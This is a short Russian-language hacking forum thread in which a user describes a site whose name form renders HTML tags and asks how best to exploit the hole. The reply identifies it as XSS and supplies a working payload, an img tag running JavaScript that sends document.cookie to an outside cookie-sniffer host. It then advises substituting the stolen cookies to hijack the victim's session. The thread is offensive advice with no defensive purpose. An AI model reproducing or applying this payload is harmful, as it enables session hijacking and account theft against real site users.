|
При вводе имени работают теги!
Здрасти есть один сайт. При вводе имени в форму <form> можно вводить теги и они работают, а при попытке вводить (примерно) <? echo data("s = h = m")?> в тексте оказывается слеши перед кавычками <? echo data(/"s = h = m/")?> и ни че не работает, а простые теги html работают все!
Суть вопроса: на сколько опасна данная уязвимость, и как её лутше использовать. |
В умелых руках уязвимость довольно опасна! Это так называемая XSS.
пишешь что то типа <img src=javascript:aa=new Image();aa.src="ht tp://antichat.ru/cgi-bin/s.gif?"+document.cookie;> и если все пройдет ok на antichat'овский снифер придут куки. Дальше ты свои заменяешь на угнанные куки и юзаешь их по назначению. =) |
| Время: 19:35 |